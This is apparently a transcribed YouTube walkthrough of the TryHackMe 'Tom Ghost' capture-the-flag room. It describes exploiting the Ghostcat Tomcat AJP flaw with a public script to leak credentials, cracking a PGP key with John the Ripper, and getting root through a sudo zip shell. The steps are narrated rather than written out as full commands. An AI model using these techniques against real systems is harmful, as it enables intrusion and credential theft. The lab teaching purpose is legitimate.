 Hey everyone at the front of this video I wanted to include a short and quick little announcement because I'm very very excited about this Nomcon. Nomcon is happening June 13th 2020 this Saturday that'll be live on Twitch TV slash Nomsec Ben from hacker one is going to be putting this event on along with myself Stoke and the cyber mentor there'll be seven hours of talks and Sunday is dedicated to three different workshops So you can find out the whole talk schedule and everything online at nomcon.com And along with that I'm going to be hosting the capture the flag competition The capture flag competition starts the day before just June 12th that Friday And it'll go until about the time for my talk at the very end of the actual conference on Saturday So registration is finally open and live if you want to go check that out You can go to ctf.nomcon.com That is HTTPS because I know a lot of people got angry at me when I posted verset con without it But please please please go register It's going to be a 31 hour competition if you enjoyed verset con this game will be even bigger and even better So please go sign up. It's going to be a blast and I'm really really excited about it And I hope that you are too so please go check it out ctf.nomcon.com and enjoy the video. I'll see you guys there next week only seven days till the game Hello everyone, my name is John Hammond and welcome back to their try hack me YouTube video in this case I want to be showcasing the Tom ghost room which demonstrates the ghost cat vulnerability Very very recent in terms of some of Tom cat web servers. So let's hop on over to my screen I'll show you the room here. I've got it open and I am joined the room I've deployed the machine here the only prompt that we have for all of these is Compromise this machine and obtain user dot text and then escalate privileges and obtain root dot text So looks like we're just kind of on our own not usually the guided process that Try hack me typically offers for us. So I have this machine here. I'll go ahead and create a directory for this So let's make directory Tom ghost. Let's hop in there and I will create a read me directory or a file anyway So I could keep track some of our notes here and with that I will keep track of the IP address as a variable so I can just spit that into a lot of different shells I'm gonna have to retype it all the time Create all these tasks here. Let's actually create a section for nmap scan, which we can go ahead and fire off Ideally, hopefully, hopefully the machine is up and all the ports are accessible If not, I'll just pause the video and we'll keep waiting, but I have been able to ping it Oh, and I need to go ahead and create that nmap directory. There we go but I mean as you can see I've Here I'll ping the IP address. He seems to be up So hopefully that nmap scan will return some good stuff for us But anyway, let's go try to see if it has a web server I entered my export command into my URL bar. So that wasn't very very helpful Okay, he still needs a little bit of time to get his his web server up So I'll pause the video and we'll get back to it once that's ready Okay, so it's been a few minutes and my nmap scan actually returned looks like we have port 22 open 53 and 8009 as well as 8080. So the 8080 must be Tomcat looks like there actually wasn't anything on 80 itself So that page would never have loaded for me regardless Apache Tomcat one of the later versions. This one should still be susceptible to ghost cat this recent vulnerability Let me go ahead and do some googling on that. We'll check out ghost cat. See what it really is If you want to do a little bit more in-depth reading here, you certainly can there is a lot of articles about it on this new recent vulnerability 2020 It's like came out in March AJP protocol Apache Jcer protocol binary protocol used to in the Apache Tomcat web servers Messaging communication with the server and serverless. I won't go deep in the weeds on Really everything that this contains. I'd rather just go ahead and exploit it. So the Notion here though is that this can Quickly become a venue and outlet for remote code execution so we can turn in and get control of the box they actually have an interesting tweet here if you upload files and Those are saved in accessible spot. Those could be turned into remote code execution I believe we don't do that in this specifically and in the ghost cat room. Let's see what we do though So I'm gonna just simply Google the ghost cat GitHub exploits or Ghosts etc etc ghost cat exploit github whatever you want to track down. I see a cool one from full hub I see some verification one. I've had a lot of success with the zero zero the way But again, it's certainly useful and willing to go check out some of these it looks like this one also does a similar technique as What the others do the verification when I haven't checked out though That looks like it might just try to determine if it is vulnerable But not actually exploit it this one AJP shooter from zero zero the way looks to work very very well and kind of For my testing prior. So let's go ahead and download this I'll get clone it. I will Get clone this Checking out the usage here it showcases our arguments that we can supply URL the port whether I want to read or evaluate something and What we might be looking for so the web INF or web.xml file in Tomgat and in AGP for what we're working with Might very well have some useful Information on users and other other like system configuration files. So let's go go ahead and try that That's in the ghost cat directory now fire you were to run and Python AJP shooter It looks like it needs all of the arguments that we would supply so URL for one thing AGP port and you can see in their screenshots They showcase some good examples here. So I'll fire this up 8080 is for the actual Tomcat itself and you can see that again in our example here the AJP server was on 8009 and what we want to read a web INF web.xml and read so 8009 web INF web.xml read That triggers it and fires it away looks like it says welcome to ghost cat and potentially some credentials here with this sky fuck user and that so That read that web.xml file for us and now we've got that useful information I'm just gonna copy this and slap it into our notes Exploiting ghost cat so we have this user Sky fuck. Okay, so SSH is open so we could potentially SSH with that to the IP address Go ahead and do that We'll grab his password in here Hey, okay All right. So what do we have in here? Looks like we have a credential dot PGP and a try hack me dot ASC file So these are some can do privacy guard or pretty good privacy Files that are encrypted so we could go ahead and work with these. I'm gonna go ahead and download them So let's scp to sky fuck at that IP address and let's grab everything in their home directory and Move it into this here. It's gonna ask for that password which we should still have in our clipboard So I can just paste that in and now we're downloading these so this ASC file Let's take a look at these. Let me file these open the ASC file has some particular information here if I Check this out. It is a private key block. So we might need to crack this We can thankfully do this with John the Ripper. So let's start that process the GPG file, that's the straight-up encrypted one So we're going to use that with kind of the key that we could potentially get out of the ASC file Let's go. Let's use some opt John the Ripper run GPG to John on our try hack me and then we can go ahead and give that to a file hashes for John And now let's run that John the Ripper utility on that hashes for John file and we'll use our word list Rock you dot text which I have in my opt directory because that's where I put a lot of my tools and stuff Looks like it can crunk crank crush through this Other words. I don't know if I need to supply a format or it'll figure it out So I'm gonna stand by and see if it actually cracks anything Okay, as that was rolling through I realized I probably had that argument set up in the wrong way I should use the word list before I specify the Actual hashes that I want to use because that way won't get confused on what hashes it might be looking at So word list rock you dot text now when that's cranking through it awesome It finds the password. So that should be GPG import that try hack me a C file and using the password that we just Had it cracked. We should be able to go ahead and actually enter that Alexandre was what we use that's been imported successfully now I should be able to GPG tack tack decrypt our credential dot PGP there we go Okay, so Merlin now is an account that we can access and we have a successful password for that So let's go ahead and I guess take note of that and Try an SSH with that guy. So let's break out of that sky command and Let's move into Merlin supply that password and Now we have a new user that we can log in as we have user dot text. There we go. There's our flag. I Accidentally pasted the password in the prompt whatever Let's go ahead and paste that guy in and Now let's start to try and enumerate see how we can privisk Checking just simple pseudo entries looks like what commands can we run as Merlin with pseudo privileges? We can run no password user bin zip, which is pretty great because that's totally got to be something in gtfobans So let's go check out. What can we do with zip should be able to go ahead and get a shell? so zip go ahead and run something with getting a shell and It needs a temporary directory. So whatever. Let's just try to Spin that up. There we go Entering those commands. We simply have our flag as root. You can see our prompt here We have our hashtag so we are in fact root if I check out my directory I moved us into the root directory ID who am I we are in fact root So let's check out that root text file super easy privisk to go ahead and steal that root text file Okay, that was that room a little bit of a stumbling block at least in my case because GPG I guess I don't know why I was being stupid and didn't even bother with the keys on that But that's how you can do that if you have that ASC file You can import that get the crack password if you can determine that and go ahead and decrypt anything that was used with that so Ghostcat right that's the vulnerability that was the kind of exploit And I think that that reference there is is actually really really cool looking through these AJP shooters seem to be pretty effective in my case I guess I'd have to take a look at some of these other tools and utilities to do some damage with that recent Tomcat vulnerability Anyway, thank you guys so much for watching. I hope you enjoyed this video if you did please do press that like button If you didn't I don't know what to tell you Sorry Maybe next time What do you want me to say? Okay, thanks for watching. Love to see you guys in discord server. There's a link in the description Please do comment. Please do subscribe. Please do check it out on patreon paypal. I appreciate any of your support I'm so so grateful for you guys. It's just surreal. So thanks for everything. Take care. I'm gonna end the video now This is weird. Goodbye